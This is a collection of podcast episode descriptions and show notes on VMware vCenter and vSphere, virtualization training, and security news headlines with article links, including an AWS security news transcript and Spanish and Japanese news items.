Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR: It runs on vCenter, my first and only virtualization love! Unlimited VM "powered on" time and unlimited bandwidth Intergration with PowerShell so you can run a single script to "heal" your environment to a gold image Easy integration with pfSense to be able to manage the firewall and internal/external IPs Price comparable to what we're paying now in Azure land
You! Yes, you! Running vSphere 6.5 or 6.7? We understand, you're busy! For many, many reasons, you couldn't get around to upgrading your systems to 7.0 when VMware deprecated support for 6.7 and 6.5 on October 15th, 2022. So now you're at a cross roads. vSphere 8 is out, but fairly new, and comes with its own set of new hardware requirements. Assuming your existing hardware meets them, do you upgrade to vSphere 7 or vSphere 8? If instead you get new hosts, should you run ESXi 7 or 8 on them? And what if you're already running vSphere 7? Should you upgrade to 8? It's a been a little while, but your favorite, most empathetic, most wise and most entertaining IT therapists are back in the office to look at all things vSphere 8. In this episode of Data Center Therapy, your intrepid hosts Matt ‘Pi before Pi was cool' Yette and Matt ‘Distributed Everything Si-fu' Cozzolino teach you with their technology equivalents of the martial art of Wing Chun on what's new with vSphere 8. In this episode, you, our treasured watchers (DCT is now on YouTube!) and our listeners, will get to learn about: How mature ESXi 7.0 is, when it came out, and how relatively rare PSODs are now What some of the implications of the new hardware requirements are for ESXi 8, and how boot media and types have changed since ESXi 7 appeared What new concepts and hardware support exists in ESXi 8, what Distributed Processing Units (DPUs) do and how AI/ML and hardware consumption models are managed inside vCenter What changes have taken place in the Lifecycle Manager of vCenter to make things easier to update and upgrade (both on the ESXi front, as well as the firmware of the systems ESXi is deployed on!) How regions and availability zone concepts, once solely in cloud hosting providers, has trickled down into the vSphere command-and-control paradigms as well as Tanzu's current state of integration As the Matts state in this episode, it's not too late to join “Professor” Cozzolino in his Introduction to vSphere 8 class March 21st through 24th, and his Advanced vSphere 8 class April 18th through 21st. If you need to know “how” to operate your systems, the Intro class is likely the best choice for you. If you'd like to know the “why” of best practices in vSphere, then the Advanced class is the best choice for you. To get registered ASAP, talk to your IVOXY Account Manager and we'll be happy to assist right away. As always, be sure to like, share and subscribe wherever you found this episode of Data Center Therapy. If you need assistance planning or executing your own organization's vSphere upgrades, please reach out to your IVOXY Account Manager. In the meantime, stay up to date, stay supported, stay stable and optimized (as we like our ESXi hosts to be), and stay informed, DCT friends! Talk to you on our next fresh episode!
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Fast Port Scanning in Powershell https://isc.sans.edu/diary/Port%20Scanning%20in%20Powershell%20Redux%3A%20Speeding%20Up%20the%20Results%20%28challenge%20accepted!%29/29324 Bypassing WAFs with JSON https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf Invisbile npm malware evading security checks https://jfrog.com/blog/invisible-npm-malware-evading-security-checks-with-crafted-versions/ PCI Secre Software Standard V 1.2 https://docs-prv.pcisecuritystandards.org/Software%20Security/Standard/PCI-Secure-Software-Standard-v1_2.pdf VMWare/VCenter Patches https://www.vmware.com/security/advisories/VMSA-2022-0030.html
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Fast Port Scanning in Powershell https://isc.sans.edu/diary/Port%20Scanning%20in%20Powershell%20Redux%3A%20Speeding%20Up%20the%20Results%20%28challenge%20accepted!%29/29324 Bypassing WAFs with JSON https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf Invisbile npm malware evading security checks https://jfrog.com/blog/invisible-npm-malware-evading-security-checks-with-crafted-versions/ PCI Secre Software Standard V 1.2 https://docs-prv.pcisecuritystandards.org/Software%20Security/Standard/PCI-Secure-Software-Standard-v1_2.pdf VMWare/VCenter Patches https://www.vmware.com/security/advisories/VMSA-2022-0030.html
Patch Tuesday Recap, Adobe, SAP & Microsoft, VMWare vCenter Server unpatched Cybersecurity News CyberHub Podcast October 12th, 2022 Today's Headlines and the latest #cybernews from the desk of the #CISO: Patch Tuesday: Critical Flaws in ColdFusion, Adobe Commerce Microsoft Warns of New Zero-Day; No Fix Yet for Exploited Exchange Server Flaws SAP Patches Critical Vulnerabilities in Commerce, Manufacturing Execution Products ICS Patch Tuesday: Siemens, Schneider Electric Release 19 New Security Advisories All Windows versions can now block admin brute-force attacks VMware vCenter Server bug disclosed last year still not patched Story Links: https://www.securityweek.com/patch-tuesday-critical-flaws-coldfusion-adobe-commerce https://www.securityweek.com/microsoft-warns-new-zero-day-no-fix-yet-exploited-exchange-server-flaws https://www.securityweek.com/sap-patches-critical-vulnerabilities-commerce-manufacturing-execution-products https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-electric-release-19-new-security-advisories https://www.bleepingcomputer.com/news/microsoft/all-windows-versions-can-now-block-admin-brute-force-attacks/ https://www.bleepingcomputer.com/news/security/vmware-vcenter-server-bug-disclosed-last-year-still-not-patched/ “The Microsoft Doctrine” by James Azar now on Substack https://jamesazar.substack.com/p/the-microsoft-doctrine The Practitioner Brief is sponsored by: Your BRAND here - Contact us for opportunities today! ****** Find James Azar Host of CyberHub Podcast, CISO Talk, Goodbye Privacy, Digital Debate, and Other Side of Cyber James on Linkedin: https://www.linkedin.com/in/james-azar-a1655316/ Telegram: CyberHub Podcast ****** Sign up for our newsletter with the best of CyberHub Podcast delivered to your inbox once a month: http://bit.ly/cyberhubengage-newsletter ****** Website: https://www.cyberhubpodcast.com Youtube: https://www.youtube.com/c/TheCyberHubPodcast Rumble: https://rumble.com/c/c-1353861 s Facebook: https://www.facebook.com/CyberHubpodcast/ Linkedin: https://www.linkedin.com/company/cyberhubpodcast/ Twitter: https://twitter.com/cyberhubpodcast Instagram: https://www.instagram.com/cyberhubpodcast Listen here: https://linktr.ee/cyberhubpodcast The Hub of the Infosec Community. Our mission is to provide substantive and quality content that's more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure. Thank you for watching and Please Don't forget to Like this video and Subscribe to my Channel! #cybernews #infosec #cybersecurity #cyberhubpodcast #practitionerbrief #cisotalk #ciso #infosecnews #infosec #infosecurity #cybersecuritytips #podcast #technews #tinkertribe #givingback #securitytribe #securitygang #informationsecurity
Meet Piotr Tarnawski who runs the AngrySysop.com Bog, Piotr has 44 Articles on vCenter, 17 on vROps and 14 on Powershell. We will cover some of his favorite articles, what makes him blog and learn what it's like for him as a enterprise IT Operations Engineer at a fortune 500 company!
In this week's episode, I talk about the acquisition of Citrix, a pretty crazy story of a security researcher taking on North Korea, some GDPR compliance concerns exposed in Belgium and much more! Reference Links: https://www.rorymon.com/blog/episode-215-citrix-acquired-vcenter-converter-unavailable-365-portals-offline/
Ronak Zala is a performance engineer at VMware, California. At the Silicon Valley tech giant, he has developed various microservice applications from scratch. His Cloud JVM Profiling Service for distributed micro-service architectures is currently being applied at scale for monitoring and analysis at VMware's vCenter. He shares his fascinating journey as a software developer at VMware and the innovative environment which fostered his growth as a programmer. He also provides valuable experiences and exclusive insights about core engineering concepts including byte code manipulation, APMs, stack overflow, heap analysis, fixing memory leaks, low overhead memory management for optimizing CPU cycles, quantum computing, AHM-64, and much more. Watch Full Video https://bit.ly/techkraftpodcastvideo-18 Host : Ravi Mandal https://www.linkedin.com/in/ravimandal/ https://instagram.com/rvimandal Guest: Ronak Zala https://www.linkedin.com/in/ronakzala/ TechKraft Inc info@techkraftinc.com https://www.linkedin.com/company/tech... https://facebook.com/techkraftinc http://instagram.com/techkraftinc
Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let's start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected there, but it didn't get there. Watch the video version of this episode on my YouTube channel. Read the full text of this episode with all links on avleonov.com blog.
Links: “I Trust AWS IAM to Secure my Applications. I Don't Trust the IAM Docs to Tell Me How”: https://ben11kehoe.medium.com/i-trust-aws-iam-to-secure-my-applications-i-dont-trust-the-iam-docs-to-tell-me-how-f0ec4c119e79 “Introduction to Zero Trust on AWS ECS Fargate”: https://omerxx.com/identity-aware-proxy-ecs/ Threat Stack Aquired by F5: https://techcrunch.com/2021/09/20/f5-acquires-cloud-security-startup-threat-stack-for-68-million/ AWS removed from CVE-2021-38112: https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/ Ransomware that encrypts the contents of S3 buckets: https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ TranscriptCorey: This is the AWS Morning Brief: Security Edition. AWS is fond of saying security is job zero. That means it's nobody in particular's job, which means it falls to the rest of us. Just the news you need to know, none of the fluff.Corey: This episode is sponsored in part by Thinkst Canary. This might take a little bit to explain, so bear with me. I linked against an early version of their tool, canarytokens.org, in the very early days of my newsletter, and what it does is relatively simple and straightforward. It winds up embedding credentials, files, or anything else like that that you can generate in various parts of your environment, wherever you want them to live. It gives you fake AWS API credentials, for example, and the only thing that these things do is alert you whenever someone attempts to use them. It's an awesome approach to detecting breaches. I've used something similar for years myself before I found them. Check them out. But wait, there's more because they also have an enterprise option that you should be very much aware of: canary.tools. You can take a look at this, but what it does is it provides an enterprise approach to drive these things throughout your entire environment and manage them centrally. You can get a physical device that hangs out on your network and impersonates whatever you want to. When it gets Nmap scanned, or someone attempts to log into it, or access files that it presents on a fake file store, you get instant alerts. It's awesome. If you don't do something like this, instead you're likely to find out that you've gotten breached the very hard way. So, check it out. It's one of those few things that I look at and say, “Wow, that is an amazing idea. I am so glad I found them. I love it.” Again, those URLs are canarytokens.org and canary.tools. And the first one is free because of course it is. The second one is enterprise-y. You'll know which one of those you fall into. Take a look. I'm a big fan. More to come from Thinkst Canary weeks ahead.Corey: This podcast seems to be going well. The Meanwhile in Security podcast has been fully rolled over and people are chiming in with kind things, which kind of makes me wonder, is this really a security podcast? Because normally people in that industry are mean.Let's dive into it. What happened last week in security? touching AWS, Ben Kehoe is on a security roll lately. His title of the article in full reads, “I Trust AWS IAM to Secure My Applications. I Don't Trust the IAM Docs to Tell Me How”, and I think he's put his finger on the pulse of something that's really bothered me for a long time. IAM feels arcane and confusing. The official doc just made that worse For me. My default is assuming that the problem is entirely with me, But that's not true at all. I suspect I'm very far from the only person out there who feels this way.An “Introduction to Zero Trust on AWS ECS Fargate” is well-timed. Originally when Fargate launched, the concern was zero trust of AWS ECS Fargate, But we're fortunately past that now. The article is lengthy and isn't super clear as to the outcome that it's driving for and also forgets that SSO was for humans and not computers, But it's well documented and it offers plenty of code to implement such a thing yourself. It's time to move beyond static IAM roles for everything.Threat Stack has been a staple of the Boston IT scene for years; they were apparently acquired by F5 for less money than they'd raised, which seems unfortunate. I'm eagerly awaiting to see how they find F5 for culture. I bet it's refreshing.and jealous of Azure as attention in the past few episodes of this podcast, VMware wishes to participate by including a critical severity flaw that enables ransomware in vCenter or vSphere. I can't find anything that indicates whether or not VMware on AWS is affected, So those of you running that thing you should probably validate that everything's patched. reach out to your account manager, which if you're running something like that, you should be in close contact with anyway.Corey: Now from AWS themselves, what do they have to say? not much last week on the security front, their blog was suspiciously silent. scuttlebutt on Twitter has it that they're attempting to get themselves removed from an exploit, a CVE-2021-38112, which is a remote code execution vulnerability. If you have the Amazon workspaces client installed, update it because a malicious URL could cause code to be executed in the client's machine. It's been patched, but I think AWS likes not having public pointers to pass security lapses lurking around. I don't blame them, I mean, who wants that? The reason I bring it up is Not to shame them for it, but to highlight that all systems have faults in them. AWS is not immune to security problems, nor is any provider. It's important, to my mind, to laud companies for rapid remediation and disclosure and to try not to shame them for having bugs in the first place. I don't always succeed at it, But I do try. But heaven help you if you try to blame an intern for a security failure.And instead of talking about a tool, Let's do a tip of the week. Ransomware is in the news a lot, But so far, all that I've seen with regard to ransomware that encrypts the contents of S3 buckets is theoretical proofs—or proves—of concept. That said, for the data you can't afford to lose, you've got a few options that stack together neatly. The approach distills down to some combination of enabling MFA delete, enabling versioning on the bucket, and setting up replication rules to environments that are controlled by different credential sets entirely. This will of course become both maintenance-intensive and extremely expensive for some workloads, But it's always a good idea to periodically review your use of S3 and back up the truly important things.Announcer: Have you implemented industry best practices for securely accessing SSH servers, databases, or Kubernetes? It takes time and expertise to set up. Teleport makes it easy. It is an identity-aware access proxy that brings automatically expiring credentials for everything you need, including role-based access controls, access requests, and the audit log. It helps prevent data exfiltration and helps implement PCI and FedRAMP compliance. And best of all, Teleport is open-source and a pleasure to use. Download Teleport at goteleport.com. That's goteleport.com.Corey: I have been your host, Corey Quinn, and if you remember nothing else, it's that when you don't get what you want, you get experience instead. Let my experience guide you with the things you need to know in the AWS security world, so you can get back to doing your actual job. Thank you for listening to the AWS Morning Brief: Security Editionwith the latest in AWS security that actually matters. Please follow AWS Morning Brief on Apple Podcast, Spotify, Overcast—or wherever the hell it is you find the dulcet tones of my voice—and be sure to sign up for the Last Week in AWS newsletter at lastweekinaws.com.Announcer: This has been a HumblePod production. Stay humble.
This Week in the Security News: The Side Eye Toddler, Zix, Clubhouse, VCenter redux, Auntie M, Safepal, Virgil Griffith, the FBI, & the Expert Commentary of Jason Wood! Show Notes: https://securityweekly.com/swn153 Visit https://www.securityweekly.com/swn for all the latest episodes! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly
This Week in the Security News: The Side Eye Toddler, Zix, Clubhouse, VCenter redux, Auntie M, Safepal, Virgil Griffith, the FBI, & the Expert Commentary of Jason Wood! Show Notes: https://securityweekly.com/swn153 Visit https://www.securityweekly.com/swn for all the latest episodes! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly
This Week in the Security News: The Side Eye Toddler, Zix, Clubhouse, VCenter redux, Auntie M, Safepal, Virgil Griffith, the FBI, & the Expert Commentary of Jason Wood! Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn153
In this episode Chris talks about applying a Windows update that broke all of his printing. Josh talks about a student that sent him an email asking for filter changes to be applied, and he talks about an experience with a stolen Chromebook. Cory talks about his new visitor management system. The newly released critical patches for Nagios and VCenter are also discussed. Article we discuss - https://www.bleepingcomputer.com/news/security/new-windows-security-updates-break-network-printing/ Check out our sponsor ClassLink | Single Sign-On for Education Tweet us at @k12techtalkpod email us k12techtalk@gmail.com BUY A SHIRT AND/OR HOODIE! https://tinyurl.com/k12techtalkGOTSHIRTS Visit our sponsors at: somethingcool.com provisionds.com arubanetworks.com classlink.com
HCI Mesh is a unique, software-based approach for disaggregation of compute and storage resources. HCI Mesh brings together multiple independent vSAN clusters for a native, cross-cluster architecture that disaggregates resources and enables the utilization of stranded capacity. Simply, vSAN allows one or more vSAN clusters to remotely mount datastores from other vSAN clusters (servers) within vCenter inventory. This week on the Virtually Speaking Podcast we welcome David Boone to help unpack this vSAN feature. Read more
Learn how to setup your own home lap with @vmwarensxcloud, who takes you through his 10 part blog series showing you the the key elements to setup your home lab. Part 8 covers vCenter setup!
On this week's episode of the podcast I cover some highlights from Microsoft BUILD and Google IO. I also get into multiple stories about vulnerabilities and Ransomware attacks plus much more! Reference Links: https://www.rorymon.com/blog/episode-178-major-vulnerabilities-published-sysinternals-updates-more/
一般社団法人JPCERT コーディネーションセンター(JPCERT/CC)は5月26日、VMware vCenter Serverの複数の脆弱性に関する注意喚起を発表した。影響を受けるシステムは以下の通り。
Fuchsia OS existe / Recuperan datos de cacos / Más límites a los pagos en efectivo / Windows 10 no se deja ver / iMac M1 por dentro / Bugazo en vCenter Patrocinador: Llegan los nuevos programas de inmersión lingüística de verano http://cursosnle.com/ de Nathalie Language Experiences. Pensados para niños de 10 a 18 años, podrán viajar a Londres, Malta o Pirineos y aprender inglés con profesores nativos http://cursosnle.com/ y con familias de acogida. — Pide más información sin compromiso hoy mismo http://cursosnle.com/. Fuchsia OS existe / Recuperan datos de cacos / Más límites a los pagos en efectivo / Windows 10 no se deja ver / iMac M1 por dentro / Bugazo en vCenter Google lanza por sorpresa Fuchsia OS. El primer dispositivo elegido es el Nest Hub de 2018 https://www.elespanol.com/elandroidelibre/noticias-y-novedades/20210525/fuchsia-oficial-nuevo-sistema-operativo-google-domotica/583941889_0.html, las pantallas inteligentes con pocas funciones más que servir de casa al Asistente de Google. Fuchsia OS sustituye de forma casi impercetible al presente Cast OS como base ultra-ligera sobre la que mostrar los servicios digitales. ¿Llegará a más dispositivos como teles, domótica, Chromecasts... móviles? ¿es simplemente un lugar donde comprobar su funcionamiento de forma cautelosa? La policía británica recupera los datos de delicuentes que borró por error. En enero, un fallo de sintaxis en un vetusto sistema de almacenamiento limpió los registros informáticos de casi 113.000 delincuentes, incluyendo pruebas y demás. Los datos ya están recuperados https://www.bbc.com/news/uk-politics-57242885, dicen que no ha afectado a investigaciones actuales, y que lo modernizarán en... 2028. El gobierno español quiere controlar los pagos digitales y no-digitales. Baja el límite a 1.000 euros los pagos en efectivo para profesionales, que seguirá en 2.500 para particulares: el resto todo de forma digital https://www.businessinsider.es/puede-afectarte-nueva-ley-fraude-fiscal-871025. Añadirá un control más ferreo de las carteras de cripto-activos a nivel nacional e internacional. Microsoft no nos enseña nada del futuro de Windows 10. Mucho "va a ser genial" y "va a cambiarlo todo", pero nos quedamos con las ganas https://www.genbeta.com/actualidad/satya-nadella-promete-actualizaciones-importantes-windows-ultima-decada-muy-pronto y sin ver nada. Parece que quieren renovar tanto la interfaz en parte (Sun Valley) como la distribución de aplicaciones que era parte de la esencia de Windows 10X. Veremos. La creadora del RGPD dice que la normativa se ha quedado pequeña. Viviane Reding, ex-comisaria de Justicia de la Unión Europea que introdujo la GDPR en 2012, piensa que su administración debería estar más federalizada y que los mecanismos que otorga a los gobiernos y agencias están infrautilizados https://www.politico.eu/article/eu-privacy-laws-chief-architect-calls-for-its-overhaul/. Traducción: hay que dar palos más grandes. Los nuevos iMac de 24" están casi vacíos por dentro. A pesar de ser más finos que el iPhone original, la placa electrónica es tan pequeña que deja sitio para dos grandes placas metálicas https://www.ifixit.com/Teardown/iMac+M1+24-Inch+Teardown/142850#s288463 cuya única función parece ser amplificar los altavoces, y que ocupan el 30% del área frontal bajo la pantalla. Curioso. Encuentran el perfil de Amazon de Jeff Bezos. Dejó seis reseñas durante los primeros años https://www.inc.com/bill-murphy-jr/i-just-found-everything-jeff-bezos-has-ever-reviewed-on-amazon-its-utterly-fascinating.html del portal de comercio electrónico, la última sobre un bote de leche fresca https://www.amazon.com/gp/profile/amzn1.account.AHDRLTPKOLOHOHLVQ7U7TVCRPW7A/ref=cm_cr_srp_d_gw_btm?ie=UTF8&tag=wwwinccom-20 con vitaminas, pero desde 2006 está muy ocupado. Ahora que dejará Amazon en unos meses, quizá vuelva a comentar sus compras. La piratería de películas a través de WhatsApp en India me parece un caso extremadamente curioso. Por un lado el cifrado de las transferencias hace más difícil la detección, pero por otro lado es extremadamente simple bloquear a los distribuidores https://torrentfreak.com/court-orders-whatsapp-to-suspend-users-sharing-pirated-movie-210524/, como indican esta sentencia. Pero no entiendo muy bien cómo se detectaron los que recibían el material. Tidal y Spotify añaden reproducción musical offline en el Apple Watch. Después de muchos años esperando, los usuarios podrán seleccionar canciones y listas de reproducción que se almacenarán directamente en el reloj https://www.elespanol.com/omicrono/software/20210521/spotify-descargar-apple-watch-escucharla-sin-conexion/582942768_0.html, para poder escucharlas https://www.elespanol.com/omicrono/software/20210525/tidal-propia-aplicacion-apple-watch-plantarle-spotify/583942786_0.html sin necesidad de tener una conexión hacia Internet. Una vulnerabilidad masiva en vCenter de VMWare asusta a los expertos. Permite básicamente ejecutar código arbitrario y hacerse con el control de las máquinas que gestiona https://arstechnica.com/gadgets/2021/05/vulnerability-in-vmware-product-has-severity-rating-of-9-8-out-of-10/. Afecta a versiones 6.x y 7. Hay parche pero es un software hiper-popular en centros de datos, y quizá muchos podríais tener datos que en algún momento pasan por esas máquinas.
VMware is pervasive in healthcare, it's time to check you servers if you haven't already done so.FTAThe security flaw, which VMware disclosed and patched on Tuesday, resides in the vCenter Server, a tool used for managing virtualization in large data centers. vCenter Server is used to administer VMware's vSphere and ESXi host products, which by some rankings are the first and second most popular virtualization solutions on the market. Enlyft, a site that provides business intelligence, shows that more than 43,000 organizations use vSphere.“Serious”A VMware advisory said that vCenter machines using default configurations have a bug that, in many networks, allows for the execution of malicious code when the machines are reachable on a port that is exposed to the Internet. The vulnerability is tracked as CVE-2021-21985 and has a severity score of 9.8 out of 10.---Time to get to work.#heatlhcare #cybersecurity #vmwarevsphere #healthit #cio #cmio #chime #himsshttps://arstechnica.com/gadgets/2021/05/vulnerability-in-vmware-product-has-severity-rating-of-9-8-out-of-10/
Heavy Networking dives into building cost-effective, practical, and easily managed leaf-spine networks with sponsor Dell Technologies. We discuss Dell's SmartFabric Services offering, including the underlying infrastructure and software overlay, key automation features, interconnects for enterprise uses such as HCI, and more. Our guest is Saleem Muhammad, Director of Product Management and Marketing at Dell Technologies.
Heavy Networking dives into building cost-effective, practical, and easily managed leaf-spine networks with sponsor Dell Technologies. We discuss Dell's SmartFabric Services offering, including the underlying infrastructure and software overlay, key automation features, interconnects for enterprise uses such as HCI, and more. Our guest is Saleem Muhammad, Director of Product Management and Marketing at Dell Technologies.
Heavy Networking dives into building cost-effective, practical, and easily managed leaf-spine networks with sponsor Dell Technologies. We discuss Dell's SmartFabric Services offering, including the underlying infrastructure and software overlay, key automation features, interconnects for enterprise uses such as HCI, and more. Our guest is Saleem Muhammad, Director of Product Management and Marketing at Dell Technologies.
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Exploiting Struts in vCenter https://isc.sans.edu/forums/diary/Struts+Vulnerability+CVE20175638+on+VMware+vCenter+the+Gift+that+Keeps+on+Giving/24606/ Wikipedia Tech Support Scam https://isc.sans.edu/forums/diary/Wikipedia+Articles+as+part+of+Tech+Support+Scamming+Campaigns/24608/ Stealing MacOS Keychain https://www.youtube.com/watch?v=nYTBZ9iPqsU Beauty Camera Ads for Android include Adware https://blog.trendmicro.com/trendlabs-security-intelligence/various-google-play-beauty-camera-apps-sends-users-pornographic-content-redirects-them-to-phishing-websites-and-collects-their-pictures/
vChat (MP3 VERSION) - The Latest in Virtualization and Cloud Computing
In episode #44, Simon and David chat with Emad Younis of EmadYounis.com and VMware fame to learn what's new in vSphere 6.5, specifically related to vCenter and vSphere Management. Emad is an expert in vCenter and the entire upgrade process from vSphere 5.x and 6.x to 6.5 and offers a lot of good tips and […]
In episode #44, Simon and David chat with Emad Younis of EmadYounis.com and VMware fame to learn what's new in vSphere 6.5, specifically related to vCenter and vSphere Management. Emad is an expert in vCenter and the entire upgrade process from vSphere 5.x and 6.x to 6.5 and offers a lot of good tips and […]